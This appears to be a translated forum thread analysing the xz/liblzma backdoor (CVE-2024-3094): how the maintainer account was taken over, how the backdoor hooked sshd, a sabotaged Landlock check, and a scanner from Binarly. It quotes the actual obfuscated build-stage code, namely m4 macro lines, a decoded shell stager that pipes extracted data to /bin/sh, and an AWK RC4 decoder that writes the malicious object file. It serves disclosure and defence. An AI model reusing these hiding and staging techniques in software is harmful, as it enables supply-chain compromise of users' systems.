Backdoor detected in the xz/liblzma library that allows logging in via sshd

Father

Professional
Messages
2,602
Reaction score
761
Points
113
In the XZ Utils package, which includes the liblzma library and utilities for working with compressed data in the "format.xz", revealed a backdoor (CVE-2024-3094) that allows intercepting and modifying data processed by applications associated with the liblzma library. The main target of the backdoor is the OpenSSH server, which in some distributions is linked to the libsystemd library, which in turn uses liblzma. Linking sshd to a vulnerable library allows attackers to gain access to the SSH server without authentication.

The backdoor was present in the official releases 5.6.0 and 5.6.1, published on February 24 and March 9, which managed to get into some distributions and repositories, for example, Gentoo, Arch Linux, Debian sid/unstable, Fedora Rawhide and 40-beta, openSUSE factory and tumbleweed, LibreELEC, Alpine edge, Solus, NixOS unstable, OpenIndiana, OpenMandriva rolling, pkgsrc current, Slackware current, Manjaro testing. All users of xz 5.6.0 and 5.6.1 releases are advised to immediately roll back to version 5.4.6.

Among the factors that smooth out the problem, it can be noted that the version of liblzma with a backdoor did not have time to enter the stable releases of large distributions, but affected openSUSE Tumbleweed and Fedora 40-beta. Arch Linux and Gentoo used a vulnerable version of zx, but they are not affected by the attack, since they do not apply the patch to openssh to support systemd-notify, which leads to linking sshd to liblzma. The backdoor only affects x86_64 systems based on the Linux kernel and the Glibc C library.

The backdoor activation code was hidden in m4 macros from the build-to-host.m4 file used by the automake build toolkit. During the build process, obfuscated obfuscated operations based on archives (bad-3-corrupt_lzma2.xz, good-large_compressed.lzma) used for testing the correctness of operation resulted in an object file with malicious code that was included in the liblzma library and changed the logic of some of its functions. M4 macros that activate the backdoor were included in the tar archives of releases, but were not included in the Git repository. At the same time, malicious test archives were present in the repository, i.e. the person who implemented the backdoor had access to both the repository and the release generation processes.

When using liblzma in applications, malicious changes could be used to intercept or modify data, as well as to affect the operation of sshd. In particular, the malicious code substituted the RSA_public_decrypt function to bypass the authentication process in sshd. The backdoor included protection against detection and did not manifest itself when the LANG and TERM environment variables were set (i.e., when the process was started in the terminal) and the LD_DEBUG and LD_PROFILE environment variables were not set, and was activated only when the /usr/sbin/sshd executable file was executed. The backdoor also included startup detection tools in debugging environments.

In particular, the file m4/build-to-host.m4 used the following constructs

Code:
gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
...
 gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'

In the first construction, the grep operation found the file tests/files/bad-3-corrupt_lzma2. xz, which was decompressed to form a script:

Code:
####Hello####
#345U211267$^D330^W
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 .... && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####

How the attackers managed to gain access to the infrastructure of the xz project has not yet been fully clarified. It is also not clear how many users and projects were compromised as a result of the backdoor. The alleged author of the backdoor (JiaT75-Jia Tan), who placed archives with malicious code in the repository, corresponded with Fedora developers and sent pull requests to Debian related to the transition of distributions to the xz 5.6.0 branch, and did not arouse suspicion, since he participated in the development of xz over the past two years and is the second software developer the number of changes made. In addition to the xz project, the alleged author of the backdoor also participated in the development of the xz-java and xz-embedded packages. Moreover, a few days ago Jia Tan was included in the list of maintainers of the XZ Embedded project used in the Linux kernel.

The malicious change was detected after analyzing excessive CPU consumption and errors generated by valgrind when connecting via ssh to systems based on Debian sid. It is noteworthy that the xz 5.6.1 release included changes prepared by the alleged author of the backdoor in response to complaints about sshd slowdowns and crashes that occurred after upgrading to zx 5.6.0 with the backdoor. In addition, last year Jia Tan made changes incompatible with the "-fsanitize=address " verification mode, which led to its disabling during fuzzing testing.

GitHub has completely blocked the xz, xz-java, and xz-embedded repositories, which are now unavailable for analysis and downloading past versions. On archive.org the last working copy remains on the project site.

+++

A retrospective of the backdoor promotion to the xz package .

Presumably, the backdoor in the xz package was implemented by the developer Jia Tan, who in 2022 received the status of maintainer and released releases starting from version 5.4.2. In addition to the xz project, the alleged author of the backdoor also participated in the development of the xz-java and xz-embedded packages, and was included in the maintainers of the XZ Embedded project used in the Linux kernel.

Two other participants, Jigar Kumar and Hans Jansen, who appear to be virtual characters, were also seen in the organization of the backdoor promotion. Jigar Kumar in April 2022 promoted the adoption of early Jia Tan patches in xz with the implementation of support for string filters and put moral pressure on Lasse Collin, the then maintainer, criticizing that he was not able to fulfill his duties and did not accept useful patches. In June, Lasse Collin agreed that the project needed a new maintainer, complained about burnout and mental health issues, and handed over the maintainer rights to Jia Tan. After that, the user Jigar Kumar no longer appeared in the newsletter.

Having received the rights of the maintainer, Jia Tan began to actively add changes to the project and, according to statistics, took the second place among developers in terms of the number of changes in two years. In March 2023, the oss-fuzz service responsible for testing the xz package was changed from Lasse Collin to Jia Tan, and in June, changes were made to xz that add support for the IFUNC mechanism to liblzma (the crc64_fast constructor was replaced with ifunc), which was later used to organize function interception in the backdoor. The change was suggested by Hans Jansen, and Jia Tan accepted him as a member of xz. The Hans Jansen account was created just before the pull request was sent.

In July 2023, Jia Tan sent a request to oss-fuzz developers to disable ifunc verification due to its incompatibility with the "-fsanitize=address"mode. In early February 2024, a link to the project's website will appear in oss-fuzz and on the main page tukaani.org was changed from "tukaani.org/xz/" on "xz.tukaani.org", where is the subdomain "xz.tukaani.org" hosted in the GitHub Pages service and personally supervised by Jia Tan. On February 23, the xz repository hosted archives for testing the decoder, including which contained the files bad-3-corrupt_lzma2. xz and good-large_compressed. lzma with a hidden backdoor. M4 macros for activating the backdoor were included only in the tar archive with release 5.6.0 and were excluded from the Git repository, but they were shown in the file .gitignore.

On March 17, Hans Jansen, who had previously developed patches with IFUNC support, was registered as a member of the Debian project, and on March 25, they were sent a request to update the version of the xz-utils package in the Debian repository. Requests to update the version were also received by Fedora and Ubuntu developers (in Ubuntu, the repository was frozen and the change was rejected).

Requests to update the xz version were also joined by some users who stated that the new version fixed disruptive crashes detected during debugging in valgrind (problems occurred due to incorrect detection of the stack layout in the backdoor handler, and the backdoor developers tried to fix these problems in version xz 5.6.1). Andres Freund, a Microsoft employee involved in the development of PostgreSQL, also became interested in the failure, which revealed the presence of a backdoor and notified the community about it.
 
Analysis of the backdoor activation and operation logic in the xz package.

Preliminary results of reverse engineering of a malicious object file embedded in liblzma as a result of a campaign to promote the backdoor to the xz package are available. Initially, it was assumed that the backdoor allows you to bypass authentication in sshd and gain access to the system via SSH. A more detailed analysis showed that this is not the case and the backdoor provides an opportunity to execute arbitrary code in the system without leaving traces in the sshd logs.

In particular, the RSA_public_decrypt function intercepted by the backdoor verifies the host signature using the fixed Ed448 key, and if successful, executes the code transmitted by the external host using the system() function at the stage before privileges are reset by the sshd process. Data containing the execution code is extracted from the parameter " N "passed to the RSA_public_decrypt function (field" n " from the rsa_st structure containing the public key transmitted by an external host), checked against the checksum, and decrypted using the predefined ChaCha20 key at the stage before verification of the Ed448 digital signature.

The standard host key exchange mechanism is used as a sign for activating the backdoor in sshd. The backdoor takes advantage of the fact that OpenSSH certificates include the public key of the person who generated the signature, and responds only to the key prepared by the attacker and corresponding to the predefined fixed key Ed448. If the public key signature verification fails, or if the integrity of the execution data is not confirmed, the backdoor returns control to the regular SSH functions.

Since the private key of the attacker is unknown, it is impossible to implement a verification code that would allow you to activate the backdoor and implement a scanner for compromised hosts on the network. Researchers have prepared a script that demonstrates the technique of substituting a public key with arbitrary content into an OpenSSH certificate transmitted by the SSH client, which will be processed in the RSA_public_decrypt function intercepted by the backdoor.

The researchers also noticed the presence of a design that defuses the backdoor (killswitch) on the local system in the presence of the environment change "yolAbejyiejuvnup=Evjtgvsh5okmkAvj"set before launching sshd.

Additionally, you can note a detailed analysis of shell constructs used to obfuscate the process of extracting an object file with a backdoor and substituting it into the liblzma library. During the build of the xz package, the build-to-host.m4 script ran code that found the bad-3-corrupt_lzma2.xz archive among the test files, replaced some characters in it, turned it into an intact archive, and extracted the shell script from it.

Code:
gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
...
gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
gl_path_map='tr "\t \-_" " \t_\-"
'

The resulting shell script bit by bit extracted another shell script from the contents of the good-large_compressed.lzma archive, skipping certain sequences with the head and tail commands, and replacing characters with the tr command.

Code:
####Hello####
# a few binary bytes here, but as it's a comment they are ignorred
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####

As a result, a rather complex and voluminous shell script was formed that extracts the backdoor file directly from the good-large_compressed.lzma archive, decrypts it and embeds it in liblzma. Among other things, the script included an implementation of the plugin mechanism, which allows you to subsequently deliver additional executable components through the placement of new test archives, without changing good-large_compressed.lzma and bad-3-corrupt_lzma2.xz, but using signature search. The code also included a decoder based on the RC4 algorithm implemented in AWK:

Code:
N=0
W=88664
else
N=88664
W=0
fi
xz -dc $top_srcdir/tests/files/$p | eval $i | LC_ALL=C sed "s/\(.\)/\1\n/g" | LC_ALL=C awk 'BEGIN{FS="\n";RS="\n";ORS="";m=256;for(i=0;i<m;i++){t[sprintf("x%c",i)]=i;c[i]=((i*7)+5)%m;}i=0;j=0;for(l=0;l<8192;l++){i=(i+1)%m;a=c[i];j=(j+a)%m;c[i]=c[j];c[j]=a;}}{v=t["x" (NF<1?RS:$1)];i=(i+1)%m;a=c[i];j=(j+a)%m;b=c[j];c[i]=b;c[j]=a;k=c[(a+b)%m];printf "%c",(v+k)%m}' | xz -dc --single-stream | ((head -c +$N > /dev/null 2>&1) && head -c +$W) > liblzma_la-crc64-fast.o || true
 
Changes made by the author of the backdoor to block security mechanisms continue to pop up in the xz project repository. In the build script CMakeLists.txt a change was identified that prevented the use of the Landlock application isolation mechanism in xz, with its support in the system. An extra dot was intentionally added to the C code that checks for the availability of the Landlock system call, which led to the failure of the Landlock check under all conditions.

The change was added by Jia Tan on February 26 under the guise of implementing an extended check for Landlock support. Previously, the conclusion about Landlock support was made only on the basis of the presence of the header file "linux/landlock.h", and the change added a test written in C that additionally calls prctl for verification. Due to the presence of a dot left at the beginning of the line, this code was inoperable and the test always failed.
 
In the wake of the highly publicized XZ Utils supply chain attack (CVE-2024-3094), Binarly has released a publicly available scanner to detect an implant in any Linux binary.

The approach used in the utility differs from the current checks, which include matching byte strings, blacklisting file hashes, and YARA rules that can lead to false positives.

Binarly has developed a special scanner that implements static analysis of binary files to detect fake transitions in the GNU indirect function (IFUNC).

In particular, it examines traffic that is marked as suspicious when malicious IFUNC resolvers are introduced.

The GCC compiler's IFUNC attribute allows developers to create multiple versions of the same function, which are then selected at runtime based on various criteria, such as processor type.

One of the main methods used by the XZ backdoor to gain initial runtime control is the GNU Indirect Function (ifunc) attribute, which allows the GCC compiler to allow indirect function calls at runtime.

The XZ backdoor modifies ifunc calls to replace the is_arch_extension_supported check, which should simply call cpuid to insert a call to _get_cpuid that is exported by the payload object file (i.e. liblzma_la-crc64-fast. o), calling malformed _get_cpuid ().

The backdoor uses this mechanism by modifying IFUNC calls to intercept execution, which leads to the introduction of malicious code.

The Binarly utility scans various points in the supply chain, in addition to the XZ Utils project, and therefore the results are much more reliable.

Detection is based on behavioral analysis and can automatically detect any variants if a similar backdoor is embedded somewhere else, even after recompiling or changing the code.

The scanner is available on xz.fail, where you can upload binary files for verification without limiting their number.

In addition, Binarly introduced a public API for conducting larger-scale scanning.
 
Top